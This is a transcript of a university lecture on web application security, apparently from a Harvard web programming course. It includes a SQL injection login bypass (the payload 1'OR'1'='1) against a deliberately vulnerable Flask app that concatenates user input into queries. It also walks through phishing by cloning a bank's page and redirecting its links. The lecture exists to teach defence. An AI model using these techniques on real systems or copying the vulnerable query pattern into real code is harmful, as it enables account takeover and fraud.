[MUSIC PLAYING] BRIAN YU: Welcome back, everyone, to Web Programming with Python and JavaScript, and welcome to our final lecture. So we've talked about a lot over the course of web programming with Python and JavaScript. Everything from version control to designing what a web page looks like using HTML and CSS, and then moving into programming languages like Python and JavaScript that are used on the server side and on the client side in order to build and design web applications. And where I thought we'd conclude today is by talking a little bit about security, about making sure that our web applications are secure, thinking about what sorts of security vulnerabilities can come about when we're thinking about web applications and deploying them to the internet, and how we can best defend against those potential vulnerabilities. And in doing so, we'll be taking a look back at all of the topics that we've talked about so far in this course, going from Git to HTML, to looking at Flask, SQL, our API design, thinking about programming in JavaScript using Django as a library later on, testing with continuous integration and continuous deployment, in addition to scalability. And looking through all of these past topics one at a time, and thinking about where security vulnerabilities might arise in any of these potential areas, and how we might start to think about defending against them. Some of these things will be things we have alluded to or talked about a little bit over the course of the semester so far. But today, we'll really take an opportunity to look at all of these topics in a little more depth and think about what security vulnerabilities could come up in the process of dealing with any of these areas within a web program. So where I thought we'd start is at the very beginning by talking about Git. So we began the semester by talking about version control using Git and GitHub, in particular, as a way of hosting code online in a place where different people from around the world can have shared access to a repository of code where they can push code to it. Or they can pull code from it using different branches and features like pull requests in order to better collaborate on code. And GitHub is really built upon this idea of open-source software, of software where the code isn't hidden from people, but is available for potentially anyone who wants to to look at that code, to see that code, and if they want to, propose pull requests or suggestions or changes to that code. And so let's think about open-source software just as a high level idea right now. What are some security benefits of open-source software, and what are some potential security concerns that might arise? Sure. AUDIENCE: That lots of people can see it on both sides. BRIAN YU: Great. Lots of people can see it-- AUDIENCE: But they'll fix bugs. BRIAN YU: Right. And that has implications on both sides of things when it comes to bugs, which means that when you have a lot of different eyes all looking at the same code, there's a possibility that someone else might catch a bug that you missed when you were writing the software. But on the flip side of course, if someone is able to spot a vulnerability in your code by reading it and they don't tell you about it or any of the other maintainers of the code, now they're potentially able to take advantage of a security exploit in your code, something you didn't see coming before. And something that they wouldn't have otherwise known about had the code not been open-source. So open-source software in that sense can sort of be a double-edged sword where you have to be careful that with a lot of people all looking at the code, there's potential both for a lot of people to be able to help you in finding bugs and making security improvements to your code, but also areas where there might be vulnerabilities. And over the course of today, we'll be looking at some of those potential vulnerabilities that can exist inside of our web programs and taking a look at how we might start to try to defend against them. What other security considerations might come up when we're using Git and GitHub, in particular? If we're hosting our code online, you might think that with open-source software, we might be able to just make our repositories private. So GitHub has the option of making repositories private so that only certain people have access to your repository. So not everyone can potentially see it. But what dangers still might arise there? Multiple possibilities. Sure? AUDIENCE: Someone had access to your GitHub account. BRIAN YU: Sure. If someone had access to your GitHub account, all your code is now stored online. Which means if some enterprising hacker is able to somehow gain access to your account, then they might be able to take advantage of that. And so for a long time, most websites have operated under a model of username and password being the way that you log in to a website. And increasingly, there are ways that hackers try and bypass that, by trying to either guess passwords, by guessing frequently used passwords, or by trying to just guess many, many different passwords, trying thousands or millions of different password combinations in the hopes of at least getting access to some person's account. And so if hackers are doing that, trying to guess at passwords very quickly in order to try and gain access to accounts, what can web applications do in order to defend against that? In order to defend against hackers that might be trying to get into other users' accounts unauthorized. Sure? AUDIENCE: They could do things like only so many misses. You can only have so many wrong or perhaps another kind of authentication, also. BRIAN YU: Great. So different possibilities exist. One might be placing a limit on the number of times you can try to log in in any period of time. Maybe you can only log in, or attempt to log in, five times, and if you miss five times, then you have to wait potentially an hour until you're able to log in again, for instance. So many applications do that. And then you also talked about other authentication systems. So what other authentication systems could there be? AUDIENCE: So like the the thing where you get a code pushed to your phone somehow. BRIAN YU: Great. So an increasingly popular form of authentication now is two-factor authentication. The idea that it's not just enough to log in with a username and password, but you might also want to log in with something else, something that is physically on you, like a phone for instance. Where, after you type in your username and password, a code is texted to your phone, or you use an app on your phone in order to get a special code, and then you have to type in that code. So that even if an attacker potentially knows your password, either by hacking into some database and finding the password or just by guessing it luckily, they're still not going to be able to access your account because they still have this added step of having to go through some two-factor authentication code. Where they now need to type in a particular code that is only available to someone that physically owns the device, like a phone. And that can also help to improve security as well. And so GitHub, for instance, has an opt-in two-factor authentication where you can enable that for your account in order to make your GitHub account more secure. And other websites are increasingly offering two-factor authentication as well, as just an additional means of trying to secure your accounts. And web applications are beginning to use that as a security measure as well. But let's think more broadly, not just about GitHub, but about Git in general, and this idea of version control and making changes and committing and saving those changes. And when we're thinking about pushing our commits to the internet, taking our changes that we've made in a GitHub repository and pushing them online, we want to be careful that sensitive information like a password or an access token for some service doesn't end up inside of a repository. Because if it does, then if it gets pushed online regardless of whether that repository is public or not, then there's a potential that other people might be able to see that access token when they probably shouldn't. And so imagine a situation where you're working on a repository. And you've made some commits and maybe accidentally, you put a password or some access token that you didn't mean to inside of one of the files, and you commit that file. And so credentials have now been exposed in one of the commits inside of your repository. And then later on down the line, you realize that mistake. You realize, oh, wait a minute, I put credentials inside that repository when I probably shouldn't have. And you make another commit removing those credentials from the file. So you add another commit, removing those credentials. And now those credentials are no longer in the head of the repository. You've taken them out, you've committed that removal. Is that secure? No. I see you shaking heads. Why not? AUDIENCE: Because you can see all the history. BRIAN YU: Great. Because of Git's version control system, the fact that it's saving every time you make a commit, it's saving your entire history. Which means that even though-- if you look at all of your files in their current state now-- those credentials are not there, anyone who has access to that repository has access to the full history of commits. They can go back and look at your previous commit messages, the previous files you've changed, and what your files looked like every stage along the way. And so once you've exposed those credentials, now even if you make another commit after that, those credentials are still going to be there. And so there are ways around this. There are ways of reverting back to a previous commit and pruning away all the extra commits, and then what we would call force pushing those commits back to GitHub in order to update it. But generally, once you've pushed code to GitHub, you might want to imagine all of that code as potentially compromised. So if you had passwords or security credentials or other keys inside of your repository that you accidentally pushed to GitHub, probably a good idea to just exchange those credentials altogether in order to get new ones because there is the potential that those credentials could be compromised once they're pushed. And so those are some security considerations that might come about when we're thinking about Git and GitHub. But let's take a look now to actually writing code and taking a look at HTML. So HTML, remember we were using in the very beginning of this semester and all throughout the semester in order to design web pages and were just consisting of tags where we had our body tags and different tags for creating lists or creating forms or creating buttons and so on and so forth. What security vulnerabilities might come about from just purely HTML? Or how might HTML be used to trick users into doing something that a malicious attacker might want them to do? Yeah? AUDIENCE: In browser, we can see HTML by going to [INAUDIBLE].. BRIAN YU: Great. Inside of a browser, for instance, you can inspect at a website, and you can take a look at all of the code. And so what are the implications of that? Well, that means that if I wanted to, I could, for instance, go into my browser and go to, I don't know, bankofamerica.com for instance. And I could pull up, OK, here's Bank of America's website, which is really just HTML that's been rendered onto my screen. And if I wanted to know what code is Bank of America using in order to make any of this stuff happen, I could reasonably control click on the site, click on View Page Source, and what that pulls up for me is a whole bunch of HTML. It's a whole bunch of it, and I don't really know what all of it does. But if I just take it all and copy it to my clipboard, and I go into a text editor and create a new file-- I'll call it bank.html-- and I'm just going to paste in all of that code that I just copied off Bank of America's website. I didn't have to write any of it, just copied it straight from there. Now if I go ahead and open bank.html, this file I just created, now I've effectively recreated Bank of America's website just by copying their HTML. And if I now host this from my own web server, for instance, I might be able to trick unsuspecting users into thinking that this is actually Bank of America's website. Because just at first glance, it looks quite reasonably like the same thing because it's the exact same HTML. And if I'm really enterprising, I can think about actually trying to make modifications to this code in order to even better be able to try and maliciously take advantage of a user who might unsuspectingly be arriving at this site, not realizing that it's not the actual Bank of America website. I might, for instance, take this Forgot Passcode button down here-- which is probably a link to some page where they might type in their email address or try and type in some new passcode that they want for instance-- and I might just take this HTML file, and I'll just search for forgot passcode. And OK, here it is. Here's forgot passcode. And if we notice, it's located inside of an a tag-- an anchor tag-- which has this href attribute, which is going to be where the user is linked to if they were to ever click on that I forgot my password button. And so if I take this link, this secure.bankofamerica.com/login something, and instead of linking to that, link to, I don't know, htps cs50.github.io/web or whatever other page I want to redirect the user to. Now if I refresh the site, it looks like Bank of America's website once again, but when they go over here and they try and click on this Forgot Passcode button, now they're taken to our website or whatever website I want to take the user to. I can modify the HTML that they have in order to direct them anywhere. And so that's sort of one of the common ways that attackers are able to use HTML to try and trick users into doing something. In particular, noting the fact that you can take a link and make it look like it's going anywhere, but really take the user to somewhere that you want. I can have something like this where if I just have a href equals url1-- where url1 is where I want the user to be taken to and url2 is just the text that appears to the user-- then the user might reasonably be tricked into thinking that they're going to url2 when in reality, they're going to url1. And so a simple example of that might be inside of link.html here. We're in link.html. It's a very simple HTML website, where on inside of my body tag, I have an anchor tag, which is just going to be a link. And the href of that link is this course's website, for instance. But in between the a tags, what I have is just google.com, for instance. And so what that means is that if I were to open up link.html, for instance, what the user sees is something like this, a page that just has a link to Google. And they might reasonably think that clicking on that link should take them to Google when in fact, when they click on that link, they're taken here instead, to the course web page. And so you can imagine how this might actually be able to be used in order to create potential exploits. So that if someone were to take Bank of America's URL, and I go to link.html and say, all right, we'll put Bank of America here, and in the href, instead put bank.html, for instance, which is the link to the file that I created copying Bank of America's code. Now suddenly, when I open up link.html, I get a link that looks like it is linking to Bank of America. I click on that link, and I get a page that looks like Bank of America's website. And if I click on forgot my passcode, now I'm redirected to some other side altogether. And so these are common ways that exploits are able to happen by taking advantage of security vulnerabilities like this where we're really just relying on people not being aware of the fact that clicking on a link might take them to somewhere else different altogether. And so how do you defend against things like this? Well, one good strategy from the user end is just to be careful about the links that you're clicking. In Chrome, for instance, if you hover over a link, down in the lower left, you can see this-- it's in small text, so you might not be able to see it, but this is the actual link that this link is going to be going to. So you can't always trust what the text is. You might want to look very carefully at where that link is actually taking you. And so these are just some examples of HTML being used in order to create potential security exploits. Questions about any of that so far? Yeah? AUDIENCE: So why does our browser allow us to see a source code in the first place? BRIAN YU: Great question. Why do web browsers allow us to see the source code in the first place? Well, in a sense, the web browser, what it's getting is the source code. So when a web browser is making a request to bankofamerica.com, for instance, bankofamerica.com needs to give back information to my computer. And that information needs to be the code, the HTML, that is going to render the page. So hypothetically, a browser might be able to just not make it easily accessible to get to that source code. But anyone who wants to, if you're really enterprising, could just look at the information that's coming back from the server. That information will contain the source code one way or another. So there's really no way to hide it. Good question, though. All right. So that was HTML being used in order to create potential security vulnerabilities or security exploits. Let's take a look now, by moving on one week, and talking about a Flask. So we talked about moving on from just creating static web pages that are displaying HTML content to using the web server, where we're communicating between the server and the user, sending packets of information along the internet. And as soon as we start dealing with that, packets of information going from one server to a client, traveling between routers, now we start to deal with other security concerns as well. So here, we'll start to talk about HTTP, Hypertext Transfer Protocol, which is typically used to send packets of information across the internet, as well as HTTPS, which is a more secure version of that, which we'll take a look at in just a moment. So let's imagine this diagram. I have one computer here, maybe it's a server running some Flask web application. And I have a client over here, which is maybe asking for information from that web server. In other words, I've got two computers that need to communicate with each other over the internet somehow. And maybe they've never communicated with each other before, so they need to talk to each other somehow. And so this computer might want to send packets of information to the other computer. But of course, that information doesn't go to the other computer directly. It needs to travel over the internet, traveling between different routers and different servers for instance, before it gets from point A to point B. And likewise, when information wants to come back from that computer over there to this computer, we also need to have information that is traveling through the internet that's potentially going to all of these routers in between. And so just looking at this diagram, what's a security vulnerability that seems clear just from a basic perspective? Yeah? AUDIENCE: Changing HTTP header could-- BRIAN YU: Great. So changing HTTP headers. That's an interesting thought, that if this request is getting passed from-- a request goes from this computer through all these routers into this computer, potentially, one of the servers in the middle, one of these routers, might be able to change that request, for instance, in order to try and make a request that's slightly different than what the original user wanted. Or likewise, because any of these intermediary routers have access to the full contents of whatever request is being passed or response is being passed back and forth between these two computers, anyone in the middle of this process could potentially take that information and have access to it. They could read an email that's being sent or the contents of a web page response that's being sent from one computer to the other because that packet of information is just traveling over the internet. So how do we solve that problem? Yeah? AUDIENCE: Encrypt traffic. BRIAN YU: Encrypt traffic. Great. Cryptography is this idea of encrypting information, of making sure-- so that we can encrypt our information so it's not the plain text of the request or the response that's getting sent over the internet, but rather some ciphertext, some encrypted version of that plain text, such that someone in the middle can't just immediately read it. And there are all sorts of different cryptography algorithms. And we'll talk high level about a couple of the ideas that go behind cryptography. And so one form of cryptography you might hear about is secret key cryptography, where the idea there is that we have a secret key that only I know and only the person at the other computer that I want to communicate with knows. And that key can be used with my cryptographic algorithm to encrypt my plain text. I take my plain text and use my secret key to encrypt it into ciphertext. Or likewise, I can use the key to decrypt information. If I have ciphertext, something that's already been encrypted, I can use that key along with the ciphertext in order to generate plain text. And so you might imagine a diagram where I have one computer over here and I'm trying to communicate with a computer down there. I have this secret key, this ability to encrypt and decrypt information, and I also have the plain text of what it is that I actually want to encrypt, the message that I want to send from one place to the other. And so what might reasonably happen? What I do in secret key cryptography is first use the key to encrypt the plain text, generating some ciphertext, some encrypted version of the plain text that someone without the key wouldn't be able to understand. So then I would need to transfer the ciphertext to this computer. And if this computer has both the ciphertext and a copy of that same secret key, then they can use that key in order to decrypt that ciphertext and regenerate the plain text-- find out what it is that I actually intended to happen-- such that now, the plain text was never transferred from one computer to the other. I was only ever transferring the ciphertext from one computer to the other. Does anyone see a problem with what we just did there? It seems like no plain text is ever transferred. What could go wrong? Yeah? AUDIENCE: How do you send the key? BRIAN YU: Great. How do you send the key? That somehow, I need to have this key and the person over here also needs to have that key. And if I'm just sending the key over the internet from one computer to the other, which I would theoretically need to do because otherwise I have no way of communicating with the other computer, then we've just created the same problem again. That any of these routers, these intermediary pieces, over the course of this communication from computer A to computer B, could just intercept the key and intercept the ciphertext. And now they have all the pieces they need in order to regenerate the plain text. So this secret key cryptography works if and only if only I and only the other person have access to the key. And it doesn't work so well if this key is something that needs to be transferred plainly over the network in order to get to the other person, because then anyone could just intercept that key. And so how do we solve that problem? Well, one solution people have come up with is this idea of public key cryptography. And this is very common, and it's what HTTPS uses in order to securely transfer information over the internet. And the idea there is instead of having just one key, we have two keys. We have a public key and a private key. And these are related in a particularly important way, and the details have to do with a lot of mathematics. But the general idea is that the public key is something that you should be able to share with anyone, and the public key can only be used to encrypt information. It will take plain text and it'll generate the ciphertext, the encrypted version. But it doesn't go in the other direction. It can only be used to encrypt data. And likewise, the private key is something that you should only ever keep to yourself. You should never share your private key with anyone else. And the private key can be used to decrypt data. That if I have encrypted information that was encrypted using the public key, I can use the private key in order to decrypt it. So what does that model look like if I now have two computers that want to communicate with each other? I still have this computer over here that wants to send this plain text over to this computer, but wants to do so securely. So the first thing that's going to need to happen is that this computer, computer B down here, gives its public key to computer A. And that's OK because the public key is something that can be shared with anyone. Anyone's allowed to see it because the public key can only be used to encrypt data. It can't be used to decrypt data. And so now computer A, having access to the plain text and the public key, now has the ability to encrypt the plain text, generating the ciphertext. That ciphertext then gets transferred down to the other computer. And now computer B has both the ciphertext, this encrypted information that nobody along this path was able to read or see, and also has access to this private key that only they had access to. And that is the only thing that can be used in order to take the ciphertext and decrypt it and figure out what it is that the message actually is. And now computer B has the ability to regenerate the plain text from it. And so now we've been able to come up with a secure way of allowing computer A and computer B to communicate with each other, just by allowing them to use this public and private key pairing such that the public key is used to encrypt the information and is shared with everyone, and the private key is only used for decrypting the information. And it doesn't matter if the intermediaries have the public key because that just means other people might be able to encrypt the data, but not necessarily be able to decrypt that information. Questions about that or any problems that we see with that model? OK. In that case, we'll go ahead and move on to talking about our next subject, which is going to be environment variables. And so environment variables are something we've seen a little bit of in Flask before, and probably in Django as well. But we'll talk about it in the context of trying to make our applications more secure. So we talked about, in the context of Git earlier, that we rarely, or probably never, want to put passwords or other secure, confidential information inside of our source code. Because as soon as we push a password or an access token to a GitHub repository, now suddenly anyone who has had access to that repository could theoretically be able to see it. Or if someone gets access to your GitHub account by some means or another, they would also be able to see that password or access token. Maybe that's going to be an access token that is the access token for getting access to your database, for instance. Or it's your access token for whatever cloud provider you're using, like Amazon Web Services, in order to deploy your application to the internet. So rather than doing something like this, where if you've used Flask before and have used their cookie-based sessions, you need to set a secret key inside of your application where you might have set a secret key to just be some random string of characters, which is totally fine from just running the application. This isn't all that secure because as soon as you push this file to the internet, now anyone who has access to your repository theoretically has access to your secret key as well. And so these are often times where we would want to use environment variables, using variables that are located just inside of the system on the computer where your program is running such that we can replace the key with os.environ.get("SECRET_KEY"). In other words, get the environment variable called secret key and use it as a secret key so that inside your code, now it just says this. So nobody who reads your code knows what the secret key for your application is, but only the computer on which this program is running that, theoretically, has that secret key set as one of its environment variables will then be able to use it. And so environment variables in that sense can be a very valuable tool when it comes to trying to make sure that we're not exposing information that we didn't want to expose when we were creating our application. Questions about environment variables? All right. So that was Flask. And let's go ahead now and move on to talking about SQL. So we talked a lot about databases and how we might go about designing databases. And in a couple of our projects now, we've had to create a table that is able to manage a database of users, where users are able to log in and log out. And in order to do that, we needed some sort of database structure in place such that users were able to be remembered by our system such that they could log in such that they had passwords and such. And you might imagine that a users table might have looked something like this, where each user has an ID, each user has a user name, each user has a password. What are potential design problems of security vulnerabilities with a table that's designed like this? Yep? AUDIENCE: If someone gets their hands on the database, they can see all the passwords. BRIAN YU: Yeah. So obviously, we want to keep our tables secure. We don't want to let just anyone have access to our database. But if by some chance, someone got access to our database, either because they managed to figure out what the password is or they got access to it in some other way, now suddenly they have access to all of the different passwords that are inside of this database. They know what everyone's password is, and now that's a major security vulnerability. Especially if some of these users might be using these same passwords not only on one website, but on many other different websites. Now their password could be compromised across a number of different websites as well. And so what might be a solution here to avoiding needing to store the password inside of the table? And this might be something that you've already done in some of your existing projects. AUDIENCE: Encrypt the passwords. BRIAN YU: Yeah. Encrypt the password. In other words, don't just store the plain text of the password, store some version of the password. And in particular, we'll generally store what we call a hashed version of the password. Where a hash function is just going to be some function inside of your code that takes text like a password and generates, deterministically, some long sequence of characters that's seemingly random that is associated with that text. And so every time you put hello in as the password and hash it, you'll always deterministically get the same output. And so then your users table might look something like this. Where you've got all of your users, but in your password column, instead of storing the actual password in plain text, you're storing some hashed version of that password. Such that hello generates this text as the password instead of just storing hello. So now if someone gets access to this database, they're still not going to be able to log into Anushree's account, for instance, if they go to the website because they're not going to know what password corresponded with this long sequence of characters. And generally, hash functions are designed to be one-way functions. That you can go from the plain text, the password, to this hashed version. But it's very, very computationally difficult to go backwards, to go from this hashed version to what the password originally was in order to generate this. And so what are the security implications of this model? How do we now log in a user, now? In this model. If someone were to log into a website, what logic would need to happen if we're no longer storing passwords but storing hashed passwords? Yeah? AUDIENCE: They could take the password they enter, you run through your hash algorithm, and you see if it matches what's in your file. BRIAN YU: Wonderful. User logs in with their user and password. You take that password and you hash it, and you check to make sure that the hash matches up. And because our hash function is deterministic, the same input will output the same output every, single time. If they did input the correct password, then the hashes should theoretically line up. Have you ever used a website before where, when you forget a password, your password, and you might want the website to just tell you what your password is, but the website says, sorry, we can't tell you what your password is, but we can let you reset your password. With this in mind, why might that be the case? Why can a website sometimes not tell you what your password is but still allow you to reset it? Or still be able to log you in if you knew your password? AUDIENCE: Because they're not storing it in text anymore. So we don't know-- BRIAN YU: Great, exactly. It's because of this idea of the one-way hash function. That if you take the password, you can generate this hashed version. But it's very difficult to go the other way around. Such that, if this is what I have access to in my database, I can look at this, and I don't actually know what Anushree's or Elle's password originally was. But if you give me their password, then I can hash it and compare it for you and maybe be able to tell you that as a result. But I could reset it if I wanted to just by replacing this field with some new hashed value. That would be something that I could do, but I might not be able to actually tell you what that password is. Of course, if these passwords are common, like these are-- if they're just passwords hello or password or 12345-- then how might I still be able to figure out a user's password even if the database looks like this? Yeah? AUDIENCE: You hash it and compare the hashes or if you can look for common hashes and see. BRIAN YU: Exactly. If you know what the hash function is, then someone trying to-- a malicious user trying to exploit the system might be able to just try a whole bunch of different common passwords, figure out what their hashed versions are, and then compare it to the versions that are here in order to figure out what the password might be. So even this is not a 100% foolproof. Someone who is trying a bunch of common passwords might still be able to figure out what it is that's going on inside of this system. And so that's certainly one vulnerability that could come up when we think about database design. But another vulnerability, and this is one we talked about a little bit a couple of weeks ago, but we'll dive into in a little more depth now-- well, actually, first, before we get there, sorry. So this was that Forgot Your Password screen that we were talking a little bit about before, where oftentimes what might happen is you'll type in an email address, for instance, and you'll click Reset Your Password. And that will send you an email that gives you the ability to reset your password. So another possible way the databases could be insecure, we might have vulnerabilities inside of the security of our database, is thinking about what information might be leaked by our database. What information can get out when we don't want it to get out? And can anyone see a potential vulnerability here, in terms of information leakage? Information that might be exposed that we might otherwise not want exposed, just from a user interface like this that people can use? AUDIENCE: Your email address might be exposed as it's going over the web. BRIAN YU: Great. So your email address is potentially exposed as it's traveling from one point to another. Although, with HTTPS and trying to encrypt that information, usually we can help to defend against that. But certainly the idea of typing in an email address and clicking on reset password leads to potential information leakage in other potential ways. Whereby if I type in an email address of my account that I've perhaps forgotten my password to, or a friend's account that I think they've forgotten their password to, potentially, and I click Reset Password, then I might see a notification that very recently might just say, password reset email sent. What if I typed in the email address of someone who didn't have an account on the website? What might you expect this website to do? Yeah? AUDIENCE: Give you an error message. BRIAN YU: Should give you an error of some sort. Something like, error, there is no such user with that email address. And now that we've seen those two screens, you type in an email address and sometimes you get password reset email sent and sometimes you get error, there is no user with that email address. Where is the potential information leakage here? Yeah? AUDIENCE: It could figure out who the users are by trying out different emails. BRIAN YU: Great. Now, by using this screen, even if I don't know people's passwords, I can figure out who has an account with this website and who doesn't, right? If it's a bank, for instance, and I type in someone's email address and I get this screen, password reset email sent, now I know that this particular user has an account with this bank. And that might not be something that your application wants to expose. And so as you go about designing web applications, you always want to be bearing these things in mind. Thinking about what information from the database is being exposed and how might information that I don't want to be exposed, might be exposed to users that I don't want to have access to that information. And certainly this is one potential example that maybe you don't really care if your users are able to know if other people have accounts on the website or not. But maybe in a place where it's more sensitive or more secure about whether or not a user has an account on the website or not, this might be something you do care about. And you'd want to think carefully about how you design the user interface, about how users are interacting with the database, and whether or not you're ever exposing information that you don't want to ultimately be exposed to the user. Questions about any of that? OK. So now moving onto the topic about SQL and vulnerabilities that we did talk about a couple weeks ago, and namely that was SQL injection. And does anyone recall what SQL injection is and why it's a problem? Yeah? AUDIENCE: So in a SQL web class, we added or condition. BRIAN YU: Great. We were able to add an or condition, or more generally, just some sort of SQL code into input for instance, and get our own SQL code to run on someone else's server. So we were able to effectively do whatever we wanted with the database because we could run arbitrary SQL queries on that database. And so the example we looked at, which we'll look at an actual Flask example of that today, is a user name and password field where we might use that information on the back end to run a SQL query that looks something like this. Select star from users where user name equals whatever the user name was and password equals whatever the password was. And we imagine that if a user logs in, like Alice with the password hello, then we'd end up running a query that looks something like this, substituting in Alice as the username, hello as the password, and now we're selecting from all the users where Alice is the username and hello is the password. And if there is a matching one, then this will return a row, and otherwise, it won't. And of course, in this case, the password is not hashed, though in a more secure system, we might want to hash that password first and then run this query. But what might go wrong here? So we talked about what would happen if someone types in Alice as the user name and something like this as the password, 1'OR'1'='1, which seems sort of complicated, but the result of that was that when we plugged everything in, now we're selecting from users where the user name is Alice and the password is 1-- which it isn't-- or the string 1 equals the string 1. Well, this is, of course, true, and now we're going to get some row back. And so how might that actually work in practice? Let's take a look at a web application that implements this very idea of just a very simple login system where an exploit like this can help anyone get access to any other user account. So let's take a look at injection and application.py. So this is just a Flask application, and our default route, this index route, first checks if there is a username inside of the session. If there is a user name in the session, in other words, if someone is logged into this current session, we'll go ahead and render a user.html page that will just display who's currently logged in for instance. Otherwise, if there is no user, then we're going to go ahead and render a login.html page that would give people the option to log into this website. And now, let's take a look at what's happening inside of the login function. So first thing we're doing is someone logs in by submitting a post request to /login. Then we get the user name by going request.form.get("username"). We get the password by request.form.get("password"), just extracting that information from the form. We're going to print out what the query is. You'll see an example of that in a moment, but this isn't strictly necessary. The interesting thing is here, on line 33. We're running db.execute, running a database query, and saying, select star from users where username equals and then plugging in the username here, and password equals, plugging in the password there, and then just getting the first row that comes back from that. And if a row does come back from that, if the query was successful, then and we log the user in by storing them inside the session and redirecting them back to the index page. In other words, we render the login page again, saying invalid=True, meaning there was some authentication problem. So that's all fairly straightforward. And of course, the key vulnerability to look at here is the fact that whatever the username and whatever the password is, we just plugged them straight into the SQL query by just using string concatenation in Python to join this all together. So now if I were to run this Flask application and take this URL and go to that URL, I'm faced with this login form. And I can type in Alice-- and normally you would want your password field to use dots by setting the input type to be passwords so nobody can see it, but for the sake of example, so you can see what I'm doing, I've changed the password field to just be a text field so you can see what password is being typed in. But of course, you would never actually want to do that in practice. But if I type hello as the password, which is Alice's password, and click Submit, now I'm logged in as Alice. It says, Welcome, alice. And you can check by looking at the log. Here's what got printed out. Here was the query that ran. Select star from users, where username equals Alice and password equals hello, and of course, that returned back Alice as my one row, and so that was all good. I'll log out now. If I try logging in with Alice with a fake password, goodbye, which is not the correct password, and Submit, I get Error, invalid credentials. Why is that? Well, here is the query that ran. Select star from users, where user name is Alice and password equals goodbye. Well, that's not going to return any results. But of course, the injection attack happens if I type user name Alice, or user name, any user name that I want, and type in 1'OR'1'=1, like that, where now if I submit that, no matter who the user is, now I see, Welcome, alice. I've logged into this user's account, and why did that happen? Well, here's the query that was run. Select star from users where username equals Alice and password equals 1 or 1 equals 1. So by injecting arbitrary SQL logic into this code, I was able to gain access to any user account that I wanted to. And that's why it's very important, when we're using SQL and running SQL queries, that we're careful to avoid SQL injection. That any time user input is being put into a query, we want to escape any potential characters that might be part of a SQL query in order to make sure that nobody can just run whatever SQL queries they want to inside of our code. And SQLAlchemy, which you may have been using in Python in order to do some of this stuff, automatically takes care of doing some of that escaping for you, if you're passing in the parameters in a Python dictionary for instance, which you might have done before. And so that's certainly something you can use as well. Questions about SQL vulnerabilities? Whether it was reasons why we might want to use hashed passwords inside of our database or how we might accidentally leak information, as via that forgot your password page, or as to how we might have gone about using SQL injection to gain access to unauthorized data. OK. Next up, before we take our break, was about APIs. So we were thinking about Application Programming Interfaces, the idea that people could write APIs for their web applications that let people programmatically gain access to information about whatever it is that your website is designed to do. So in the case of book reviews, maybe you had an API route that returned the reviews for a particular book. But you might imagine that other sites might give you API routes that do other things. We didn't do this for project three, but you might imagine that in a restaurant, for instance, that had a website, you might have an API route that gives you back your orders, for instance. What security considerations should go into designing APIs? Or what could potentially go wrong? Broad questions, so lots of possibilities here. AUDIENCE: You can expose stuff that shouldn't be exposed. BRIAN YU: You can expose stuff that shouldn't be exposed. So that's an interesting idea, that if I, for instance, had an API for being able to look at my Amazon orders or look at the food that I've ordered from a restaurant in particular, I would want that to somehow only be accessible to me and not accessible to someone else. And so how would we implement this idea of some people should be able to access certain information by the API, and other people should not be able to access that information and should only be able to access some other pieces of information? AUDIENCE: Authentication. BRIAN YU: Authentication, great. We can use what are commonly known as API keys, which are just strings of text that are associated with a particular user, effectively like a password, but for APIs. Such that in order to make an API request, you not only need to submit your request, but you also need to submit your API key. And then it's on the web application to check that key, to say, does this key have permission to look at the things that it's trying to look at? And this is the idea of route authentication, that if someone makes an API request to a particular route, you better first make sure that whoever is making that request has permission to see whatever they're asking to see before you actually show it to them. And so API keys can be used for that as well. In addition, they're often used for rate limiting, where if you're worried about someone over using an API or abusing your server of making thousands upon thousands of requests in a short period of time, you can rate limit and say, well, I only want you to be able to make x number of requests per hour. And if you have an API key, then it's pretty easy to implement this idea of rate limiting because all you have to do is keep track inside of a table somewhere this API key has used 28 requests in the last hour, so they're hitting up on their limit. And so if they use any more, we should just stop allowing them to use the API key until it refreshes for the next hour, for instance. And so in your project, you might not have needed to use an API key, but anytime you want to deal with potentially authenticated data or you want to rate limit, then you'll want to think about using an API key like you did have to use with the good reads API in order to take advantage of features like rate limiting or authenticating particular routes to make sure that only certain users have the ability to access particular routes. Questions about that? All right. In that case, we'll take a short break and when we come back, we'll take a look at JavaScript and look at the many different kinds of security vulnerabilities that come about when we start introducing JavaScript and client-side code into our web applications. Welcome back. So we're at about the midway point in the course, and then we started to talk about JavaScript. And so JavaScript, if you recall, was the language that we were using in order to write code on the client side, code that was actually running inside the user's browser and not on the server where Flask or Django was running, for instance. And this leads to a whole new host of potential security vulnerabilities. So let's start to chat about these. What could go wrong? What sorts of exploits could happen, can you think of, when we start to introduce JavaScript into the equation? Code that can run inside the user's browser. Yeah? AUDIENCE: When we [INAUDIBLE] information, [INAUDIBLE] even that it can change. Like someone's address [INAUDIBLE] that changing someone's address to someone else and using JavaScript [INAUDIBLE].. BRIAN YU: Great. So JavaScript has all these event handlers that we've talked about, whether on load or on click, that can do various things. And potentially, if someone clicks on something in code that does something malicious that's able to run, it can make something potentially bad happen. And we'll take a look at at least one example of that definitely later on today. Other things that could potentially go wrong? There are a lot of potential security vulnerabilities here. So let's just toss out some ideas. What would we want to avoid happening now that we have JavaScript code that can run inside the browser? AUDIENCE: Someone might redirect from the site you're on to another site. BRIAN YU: Great. Certainly, someone might try and redirect from the site you're on to some other site. That we've looked at ways that we can use JavaScript in order to redirect someone from one place to another. And if we're not careful, that JavaScript code might be able to redirect the user to someplace that the user doesn't necessarily want to be. And so we'll definitely look at an example of that later on, too. So that's definitely one potential vulnerability. Yeah? AUDIENCE: So like with HTML and CSS, it was all static, just like what a user sees. But with JavaScript, you can actually use it to run code on someone's machine. So if you write a malicious code, you can [INAUDIBLE] someone's computer. BRIAN YU: Exactly. So with HTML and CSS, we didn't really need to have to worry about code actually running for the most part because it was just here's the way that things look. And certainly we were able to use that to try and trick users by creating a link that looked like it went to Bank of America but actually went to my version of some different site. But when it comes to JavaScript, now we really have the potential for malicious code to be running on the user's web browser. And so how does that code get to the user's web browser? How does malicious code enter into some other seemingly benign site, and why might those be potential exploits? So where we'll start is by looking at one potential JavaScript exploit, which is quite common, called cross-site scripting. Where the idea of cross-site scripting is that we're going to try and look for a vulnerability where we can-- in the same way that in the SQL case, we were able to inject whatever SQL code we wanted into being run on a database, a malicious user, if they are able to send the right link to the right person and get them to click on a link for instance, are able to get some arbitrary JavaScript code to run inside of the user's web browser. And so let's take a look at a very simple Flask application. This is in fact, the entire Flask application, the contents of application.py, for example. And there is in fact, a major cross-site scripting vulnerability inside this application, and see if we can tease apart where exactly that is. So at the beginning, we import Flask, and we import request, which we'll need access to later. We create a new Flask application inside the current module. Then we define a default route, just when you go to the slash route. It calls this index function that returns Hello, world. And then down here, we have app.errorhandler(404). So you may 